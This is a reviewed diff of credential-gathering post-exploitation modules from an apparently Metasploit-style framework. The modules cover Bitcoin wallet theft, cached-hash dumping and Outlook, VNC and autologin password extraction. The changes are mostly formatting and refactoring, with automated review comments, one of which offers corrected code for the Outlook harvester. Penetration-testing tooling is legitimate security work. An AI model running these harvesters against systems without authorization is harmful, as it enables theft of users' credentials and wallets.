report_host(:host => ip_text,:mac => mac_text)
end
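Review bot: `h["pMacAddr"].unpack('C*')` formats every byte the railgun call returns in `pMacAddr`, so the MAC string is only correct if that buffer is exactly six bytes; `h["pMacAddr"].unpack('C*').first(6)` bounds it to the address regardless of how the out-buffer is sized (the call requests 6 in `SendARP(ip,0,6,6)`, so it likely matches today). Note that `"%02x"` also changes the stored value: the old code emitted unpadded nibbles, so `report_host` entries written by earlier runs will not match the new canonical form. The enclosing loop continues outside the hunk.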
diff --git a/modules/post/windows/gather/bitcoin_jacker.rb b/modules/post/windows/gather/bitcoin_jacker.rb
old mode 100755
new mode 100644
index e5c4792b78..af1ea56f91
--- a/modules/post/windows/gather/bitcoin_jacker.rb
+++ b/modules/post/windows/gather/bitcoin_jacker.rb
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Post
wallet = session.fs.file.new(filename, "rb")
until wallet.eof?
data << wallet.read
- end
+ end
store_loot("bitcoin.wallet", "application/octet-stream", session, data, filename, "Bitcoin Wallet")
print_status(" Wallet Jacked.")
diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb
index ffe83ad3f9..3aad4255e3 100644
--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
@@ -328,7 +328,7 @@ class Metasploit3 < Msf::Post
hash.unpack("H*")[0],
logonDomainName,
dnsDomainName,
- last.strftime("%F %T"),
+ last.strftime("%F %T"),
upn,
effectiveName,
fullName,
diff --git a/modules/post/windows/gather/credentials/enum_cred_store.rb b/modules/post/windows/gather/credentials/enum_cred_store.rb
index 5d64667166..f94a26c641 100644
--- a/modules/post/windows/gather/credentials/enum_cred_store.rb
+++ b/modules/post/windows/gather/credentials/enum_cred_store.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Post
'Description' => %q{
This module will enumerate the Microsoft Credential Store and decrypt the
credentials. This module can only access credentials created by the user the
- process is running as. It cannot decrypt Domain Network Passwords, but will
+ process is running as. It cannot decrypt Domain Network Passwords, but will
display the username and location.
},
'License' => MSF_LICENSE,
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post
end
return str_data || "Error Decrypting"
end
-
+
def decrypt_blob(daddr, dlen, type)
#type 0 = passport cred, type 1 = wininet cred
#set up entropy
@@ -112,7 +112,7 @@ class Metasploit3 < Msf::Post
def gethost(hostorip)
#check for valid ip and return if it is
- return hostorip if Rex::Socket.dotted_ip?(hostorip)
+ return hostorip if Rex::Socket.dotted_ip?(hostorip)
#convert hostname to ip and return it
hostip = nil
@@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post
ip_add= gethost(host)
- unless ip_add.nil?
+ unless ip_add.nil?
auth = {
:host => ip_add,
:port => port,
@@ -185,10 +185,10 @@ class Metasploit3 < Msf::Post
#call credenumerate to get the ptr needed
adv32 = session.railgun.advapi32
ret = adv32.CredEnumerateA(nil,0,4,4)
- p_to_arr = ret["Credentials"].unpack("V")
+ p_to_arr = ret["Credentials"].unpack("V")
arr_len = ret["Count"] * 4 if is_86
arr_len = ret["Count"] * 8 unless is_86
-
+
#tell user what's going on
print_status("#{ret["Count"]} credentials found in the Credential Store")
if ret["Count"] > 0
diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb
index 81dba96cea..c4ca4059b5 100644
--- a/modules/post/windows/gather/credentials/filezilla_server.rb
+++ b/modules/post/windows/gather/credentials/filezilla_server.rb
@@ -140,8 +140,10 @@ class Metasploit3 < Msf::Post
end
file.close
- creds, perms, config = parse_server(fs_xml) # user credentials password is just an MD5 hash
- # admin pass is just plain text. Priorities?
+ # user credentials password is just an MD5 hash
+ # admin pass is just plain text. Priorities?
+ creds, perms, config = parse_server(fs_xml)
+
creds.each do |cred|
credentials << [cred['host'], cred['port'], cred['user'], cred['password'], cred['ssl']]
diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb
index cf5202c019..d9d1f99c61 100644
--- a/modules/post/windows/gather/credentials/outlook.rb
+++ b/modules/post/windows/gather/credentials/outlook.rb
@@ -82,21 +82,27 @@ class Metasploit3 < Msf::Post
return decrypted_pw
end
+ # Just a wrapper to avoid copy pasta and long lines
+ def get_valdata(k, name)
+ key_base = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
+ registry_getvaldata("#{key_base}\\#{k}", name)
+ end
def get_registry
#Determine if saved accounts exist within Outlook. Ignore the Address Book and Personal Folder registry entries.
outlook_exists = 0
saved_accounts = 0
- next_account_id = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\", 'NextAccountID')
+
+ next_account_id = get_valdata("", 'NextAccountID')
if next_account_id != nil
#Microsoft Outlook not found
print_status "Microsoft Outlook found in Registry..."
outlook_exists = 1
- registry_enumkeys("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\").each do |k|
- display_name = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Display Name')
+ registry_enumkeys(key_base + "9375CFF0413111d3B88A00104B2A6676\\").each do |k|
+ display_name = get_valdata(k, 'Display Name')
if display_name == nil
#Microsoft Outlook found, but no account data saved in this location
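Review bot: The enumeration line `registry_enumkeys(key_base + "9375CFF0413111d3B88A00104B2A6676\\")` in get_registry references `key_base`, which is only a local inside the new get_valdata method, so this raises NameError on the first run where Outlook is found; and even if it were in scope, the GUID is already the last component of `key_base`, so the concatenation would double it. The safest fix is to lift the base path out of get_valdata into a small helper and have both callers use it, as below. get_registry continues past this hunk.
```ruby
# Profile key Outlook stores its saved account data under.
def outlook_profile_key
  "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
end

# Just a wrapper to avoid copy pasta and long lines
def get_valdata(k, name)
  registry_getvaldata("#{outlook_profile_key}\\#{k}", name)
end

# … unchanged: start of get_registry through next_account_id …
registry_enumkeys("#{outlook_profile_key}\\").each do |k|
```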
@@ -106,17 +112,17 @@ class Metasploit3 < Msf::Post
#Account found - parse through registry data to determine account type. Parse remaining registry data after to speed up module.
saved_accounts = 1
got_user_pw = 0
- accountname = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Account Name')
- displayname = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Display Name')
- email = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Email')
- pop3_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Server')
- smtp_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Server')
- http_server_url = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Server URL')
- imap_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Server')
- smtp_use_auth = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use Auth')
+ accountname = get_valdata(k, 'Account Name')
+ displayname = get_valdata(k, 'Display Name')
+ email = get_valdata(k, 'Email')
+ pop3_server = get_valdata(k, 'POP3 Server')
+ smtp_server = get_valdata(k, 'SMTP Server')
+ http_server_url = get_valdata(k, 'HTTP Server URL')
+ imap_server = get_valdata(k, 'IMAP Server')
+ smtp_use_auth = get_valdata(k, 'SMTP Use Auth')
if smtp_use_auth != nil
- smtp_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP User')
- smtp_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Password')
+ smtp_user = get_valdata(k, 'SMTP User')
+ smtp_password = get_valdata(k, 'SMTP Password')
end
if pop3_server != nil
@@ -136,10 +142,10 @@ class Metasploit3 < Msf::Post
print_status(" User E-mail Address: #{email}")
if type == "POP3"
- pop3_pw = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Password')
- pop3_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 User')
- pop3_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Use SPA')
- smtp_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Port')
+ pop3_pw = get_valdata(k, 'POP3 Password')
+ pop3_user = get_valdata(k, 'POP3 User')
+ pop3_use_spa = get_valdata(k, 'POP3 Use SPA')
+ smtp_port = get_valdata(k, 'SMTP Port')
print_status(" User Name: #{pop3_user}")
if pop3_pw == nil
@@ -160,14 +166,14 @@ class Metasploit3 < Msf::Post
print_status(" Incoming Mail Server (POP3): #{pop3_server}")
- pop3_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Use SSL')
+ pop3_use_ssl = get_valdata(k, 'POP3 Use SSL')
if pop3_use_ssl == nil
print_status(" POP3 Use SSL: No")
else
print_status(" POP3 Use SSL: Yes")
end
- pop3_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Port')
+ pop3_port = get_valdata(k, 'POP3 Port')
if pop3_port == nil
print_status(" POP3 Port: 110")
portnum = 110
@@ -186,7 +192,7 @@ class Metasploit3 < Msf::Post
print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}")
end
- smtp_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use SSL')
+ smtp_use_ssl = get_valdata(k, 'SMTP Use SSL')
if smtp_use_ssl == nil
print_status(" SMTP Use SSL: No")
else
@@ -201,9 +207,9 @@ class Metasploit3 < Msf::Post
end
elsif type == "HTTP"
- http_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Password')
- http_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP User')
- http_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Use SPA')
+ http_password = get_valdata(k, 'HTTP Password')
+ http_user = get_valdata(k, 'HTTP User')
+ http_use_spa = get_valdata(k, 'HTTP Use SPA')
print_status(" User Name: #{http_user}")
if http_password == nil
@@ -232,10 +238,10 @@ class Metasploit3 < Msf::Post
print_status(" HTTP Server URL: #{http_server_url}")
elsif type == "IMAP"
- imap_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP User')
- imap_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Use SPA')
- imap_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Password')
- smtp_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Port')
+ imap_user = get_valdata(k, 'IMAP User')
+ imap_use_spa = get_valdata(k, 'IMAP Use SPA')
+ imap_password = get_valdata(k, 'IMAP Password')
+ smtp_port = get_valdata(k, 'SMTP Port')
print_status(" User Name: #{imap_user}")
if imap_password == nil
@@ -255,14 +261,14 @@ class Metasploit3 < Msf::Post
print_status(" Incoming Mail Server (IMAP): #{imap_server}")
- imap_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Use SSL')
+ imap_use_ssl = get_valdata(k, 'IMAP Use SSL')
if imap_use_ssl == nil
print_status(" IMAP Use SSL: No")
else
print_status(" IMAP Use SSL: Yes")
end
- imap_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Port')
+ imap_port = get_valdata(k, 'IMAP Port')
if imap_port == nil
print_status(" IMAP Port: 143")
portnum = 143
@@ -281,7 +287,7 @@ class Metasploit3 < Msf::Post
print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}")
end
- smtp_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use SSL')
+ smtp_use_ssl = get_valdata(k, 'SMTP Use SSL')
if smtp_use_ssl == nil
print_status(" SMTP Use SSL: No")
else
diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb
index c63a83422b..b5781a85ac 100644
--- a/modules/post/windows/gather/credentials/vnc.rb
+++ b/modules/post/windows/gather/credentials/vnc.rb
@@ -86,20 +86,20 @@ class Metasploit3 < Msf::Post
def run
- '''
- Hash format
- :name,
- :check_file,
- :check_reg,
- :pass_variable,
- :port_variable,
- :port,
- :hash,
- :pass,
- :viewonly_variable,
- :viewonly_hash,
- :viewonly_pass
- '''
+ '''
+ Hash format
+ :name,
+ :check_file,
+ :check_reg,
+ :pass_variable,
+ :port_variable,
+ :port,
+ :hash,
+ :pass,
+ :viewonly_variable,
+ :viewonly_hash,
+ :viewonly_pass
+ '''
locations = []
diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb
index 60c3db0ead..cca0dd5480 100644
--- a/modules/post/windows/gather/credentials/windows_autologin.rb
+++ b/modules/post/windows/gather/credentials/windows_autologin.rb
@@ -53,14 +53,13 @@ class Metasploit3 < Msf::Post
creds = Rex::Ui::Text::Table.new(
'Header' => 'Windows AutoLogin Password',
'Ident' => 1,
- 'Columns' =>
- [
+ 'Columns' => [
'Domain',
'UserName',
'Password'
]
)
-
+
has_al = 0
# DefaultDomainName, DefaultUserName, DefaultPassword
diff --git a/modules/post/windows/gather/dumplinks.rb b/modules/post/windows/gather/dumplinks.rb
index 9900cd26e5..54dde5f77c 100644
--- a/modules/post/windows/gather/dumplinks.rb
+++ b/modules/post/windows/gather/dumplinks.rb
@@ -157,8 +157,8 @@ class Metasploit3 < Msf::Post
lvt['name'] = lnk_file.sysread(lvt['len'] - 0x10)
@data_out += "\t\tVolume Name = #{lvt['name']}\n" +
- "\t\tVolume Type = #{get_vol_type(lvt['type'])}\n" +
- "\t\tVolume SN = 0x%X" % lvt['vol_sn'] + "\n"
+ "\t\tVolume Type = #{get_vol_type(lvt['type'])}\n" +
+ "\t\tVolume SN = 0x%X" % lvt['vol_sn'] + "\n"
end
diff --git a/modules/post/windows/gather/enum_dirperms.rb b/modules/post/windows/gather/enum_dirperms.rb
index d0bc9ad801..2e853635fa 100644
--- a/modules/post/windows/gather/enum_dirperms.rb
+++ b/modules/post/windows/gather/enum_dirperms.rb
@@ -46,11 +46,11 @@ class Metasploit3 < Msf::Post
#p = kern.GetCurrentProcess() #get handle to current process
pid = session.sys.process.open.pid
pr = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
- pt = adv.OpenProcessToken(pr.handle, tok_all, 4) #get handle to primary token
+ pt = adv.OpenProcessToken(pr.handle, tok_all, 4) #get handle to primary token
it = adv.DuplicateToken(pt["TokenHandle"],2, 4) # get an impersonation token
if it["return"] #if it fails return 0 for error handling
return it["DuplicateTokenHandle"]
- else
+ else
return 0
end
end
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Post
gen_map = [0,0,0,0]
gen_map = gen_map.pack("L")
- #get Security Descriptor for the directory
+ #get Security Descriptor for the directory
f = adv.GetFileSecurityA(dir, si, 20, 20, 4)
f = adv.GetFileSecurityA(dir, si, f["lpnLengthNeeded"], f["lpnLengthNeeded"], 4)
sd = f["pSecurityDescriptor"]
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Post
next if d =~ /^(\.|\.\.)$/
realpath = dpath + '\\' + d
if session.fs.file.stat(realpath).directory?
- perm = check_dir(realpath, token)
+ perm = check_dir(realpath, token)
if !filter or perm.include? filter
print_status(perm + "\t" + realpath)
end
@@ -120,7 +120,7 @@ class Metasploit3 < Msf::Post
#get impersonation token
print_status("Getting impersonation token...")
t = get_imperstoken()
-
+
#loop through sub dirs if we have an impers token..else error
if t == 0
print_error("Getting impersonation token failed")
diff --git a/modules/post/windows/gather/enum_ms_product_keys.rb b/modules/post/windows/gather/enum_ms_product_keys.rb
index 3074efeeae..40aac09849 100644
--- a/modules/post/windows/gather/enum_ms_product_keys.rb
+++ b/modules/post/windows/gather/enum_ms_product_keys.rb
@@ -41,23 +41,24 @@ class Metasploit3 < Msf::Post
"License Key"
])
- keys = [["HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId"],
- ["HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId"],
- ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId"],
- ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId"],
- ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0051-0000-0000-0000000FF1CE}", "DigitalProductId"],
- ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0053-0000-0000-0000000FF1CE}", "DigitalProductId"],
- ["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\100\\Tools\\Setup", "DigitalProductId"],
- ["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77654"],
- ["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77574"],
- ["HKLM\\SOFTWARE\\Microsoft\\Exchange\\Setup", "DigitalProductId"],
- ]
+ keys = [
+ [ "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0051-0000-0000-0000000FF1CE}", "DigitalProductId" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0053-0000-0000-0000000FF1CE}", "DigitalProductId" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\100\\Tools\\Setup", "DigitalProductId" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77654" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77574" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Exchange\\Setup", "DigitalProductId" ],
+ ]
keys.each do |keyx86|
-
+
#parent key
p = keyx86[0,1].join
-
+
#child key
c = keyx86[1,1].join
@@ -122,7 +123,7 @@ class Metasploit3 < Msf::Post
(string_length-1).downto(0) do |s|
t = ((mindex << 8) & 0xffffffff) | product_id[s]
- product_id[s] = t / 24
+ product_id[s] = t / 24
mindex = t % 24
end
diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb
index 997256a854..d1483e041e 100644
--- a/modules/post/windows/gather/memory_grep.rb
+++ b/modules/post/windows/gather/memory_grep.rb
@@ -17,20 +17,19 @@ class Metasploit3 < Msf::Post
super( update_info(info,
'Name' => 'Windows Gather Process Memory Grep',
'Description' => %q{
- This module allows for searching the memory space of a proccess for potentially sensitive
- data.
- },
+ This module allows for searching the memory space of a proccess for potentially sensitive
+ data.
+ },
'License' => MSF_LICENSE,
'Author' => ['bannedit'],
'Version' => '$Revision$',
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter' ]
))
- register_options(
- [
- OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]),
- OptString.new('REGEX', [true, 'Regular expression to search for with in memory', nil]),
- ], self.class)
+ register_options([
+ OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]),
+ OptString.new('REGEX', [true, 'Regular expression to search for with in memory', nil]),
+ ], self.class)
end
def run
diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb
index ce87662f21..c03925e4f6 100644
--- a/modules/post/windows/gather/reverse_lookup.rb
+++ b/modules/post/windows/gather/reverse_lookup.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => "Windows Gather IP Range Reverse Lookup",
- 'Description' => %q{
+ 'Description' => %q{
This module uses Railgun, calling the gethostbyaddr function to resolve a hostname
to an IP.
},
@@ -34,12 +34,12 @@ class Metasploit3 < Msf::Post
], self.class)
end
-
+
def run
-
- #Add ws2_32 just in case it isn't there...
+
+ #Add ws2_32 just in case it isn't there...
session.railgun.ws2_32
-
+
#Check if gethostbyaddr is available to us
modhandle = session.railgun.kernel32.GetModuleHandleA('ws2_32.dll')
if modhandle['return'] == 0
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Post
return
end
end
-
+
#Initialize Railgun 'gethostbyaddr' call'
session.railgun.add_function('ws2_32', 'gethostbyaddr', 'DWORD', [
['PCHAR', 'addr', 'in'],
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Post
iplist.each do |x|
#Converts an IP in string formate to network byte order format
nbi = Rex::Socket.addr_aton(x)
-
+
#Call gethostbyaddr
result = session.railgun.ws2_32.gethostbyaddr(nbi.to_s,nbi.size,2)
if result['return'] == 0
diff --git a/modules/post/windows/gather/usb_history.rb b/modules/post/windows/gather/usb_history.rb
index 957f608bd6..7399852c33 100644
--- a/modules/post/windows/gather/usb_history.rb
+++ b/modules/post/windows/gather/usb_history.rb
@@ -85,10 +85,10 @@ class Metasploit3 < Msf::Post
if isadmin
mace = registry_getkeylastwritetime('HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceClasses\\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\' << guid)
if mace
- keytime = ::Time.at(mace)
- else
- keytime = "Unknown"
- end
+ keytime = ::Time.at(mace)
+ else
+ keytime = "Unknown"
+ end
out << sprintf("%25s\t%50s\n", "Volume lpftLastWriteTime", keytime)
end
print_status(info_hash_to_str(out, v))
diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb
index e8d1f2dc55..f25657310a 100644
--- a/modules/post/windows/manage/autoroute.rb
+++ b/modules/post/windows/manage/autoroute.rb
@@ -101,14 +101,12 @@ class Metasploit3 < Msf::Post
'Header' => "Active Routing Table",
'Prefix' => "\n",
'Postfix' => "\n",
- 'Columns' =>
- [
+ 'Columns' => [
'Subnet',
'Netmask',
'Gateway',
],
- 'ColProps' =>
- {
+ 'ColProps' => {
'Subnet' => { 'MaxWidth' => 17 },
'Netmask' => { 'MaxWidth' => 17 },
})
diff --git a/modules/post/windows/manage/delete_user.rb b/modules/post/windows/manage/delete_user.rb
index b357d59f0d..8df6b6bb1d 100644
--- a/modules/post/windows/manage/delete_user.rb
+++ b/modules/post/windows/manage/delete_user.rb
@@ -19,8 +19,10 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Local User Account Deletion',
- 'Description' => %q{ This module deletes a local user account from the specified server,
- or the local machine if no server is given.},
+ 'Description' => %q{
+ This module deletes a local user account from the specified server,
+ or the local machine if no server is given.
+ },
'License' => MSF_LICENSE,
'Author' => [ 'chao-mu'],
'Version' => '$Revision$',
diff --git a/plugins/db_credcollect.rb b/plugins/db_credcollect.rb
index fdff784218..6c23c5e613 100644
--- a/plugins/db_credcollect.rb
+++ b/plugins/db_credcollect.rb
@@ -57,8 +57,8 @@ class Plugin::CredCollect < Msf::Plugin
# Target infos for the db record
addr = session.sock.peerhost
# This ought to read from the exploit's datastore.
- # Use the meterpreter script if you need to control it.
- smb_port = 445
+ # Use the meterpreter script if you need to control it.
+ smb_port = 445
# Record hashes to the running db instance
hashes.each do |hash|
diff --git a/plugins/ips_filter.rb b/plugins/ips_filter.rb
index 7b4035bd46..5efa06e46c 100644
--- a/plugins/ips_filter.rb
+++ b/plugins/ips_filter.rb
@@ -68,7 +68,7 @@ module SocketTracer
# Hook the write method
def write(buf, opts = {})
if (ips_match(buf))
- $stderr.puts "*** Outbound write blocked due to possible signature match"
+ print_error "Outbound write blocked due to possible signature match"
return 0
end
super(buf, opts)
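Review bot: The switch from `$stderr.puts` to `print_error` changes a guaranteed-to-work write into a call that only succeeds if whatever object SocketTracer is mixed into provides print_error; nothing in this module defines it, so if the socket class lacks it the blocked-write path now raises NoMethodError instead of logging and returning 0. The same applies to the `print_error` calls in the read hook and in ips_match further down. If print_error is not guaranteed on the socket, keep the old `$stderr.puts` or guard with `respond_to?(:print_error)`; otherwise a comment such as `# print_error is provided by the object this module is extended onto` would save the next reader the same question.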
@@ -78,7 +78,7 @@ module SocketTracer
def read(length = nil, opts = {})
r = super(length, opts)
if (ips_match(r))
- $stderr.puts "*** Incoming read may match a known signature"
+ print_error "Incoming read may match a known signature"
end
return r
end
@@ -95,11 +95,11 @@ module SocketTracer
begin
r = Regexp.new(s[1])
if (data.match(r))
- $stderr.puts "*** Matched IPS signature #{s[0]}"
+ print_error "Matched IPS signature #{s[0]}"
return true
end
rescue ::Exception => e
- $stderr.puts "*** Compiled error: #{s[1]}"
+ print_error "Compiled error: #{s[1]}"
end
end
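Review bot: The rescue branch still binds `e` but the rewritten message drops it, so a signature whose regex fails to compile is reported without the reason; `print_error "Compiled error: #{s[1]} (#{e.message})"` keeps the useful detail. The `rescue ::Exception` is pre-existing and overly broad for a Regexp.new failure, which raises RegexpError (a StandardError), so a plain `rescue ::RegexpError => e` would be tighter. The enclosing method begins before this hunk.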
diff --git a/plugins/lab.rb b/plugins/lab.rb
index 6c5054ed7d..60e3f8b7ed 100644
--- a/plugins/lab.rb
+++ b/plugins/lab.rb
@@ -1,5 +1,6 @@
##
-## $Id$
+# $Id$
+# $Revision$
##
$:.unshift(File.join(File.expand_path(File.dirname(__FILE__)), '..', 'lib', 'lab'))
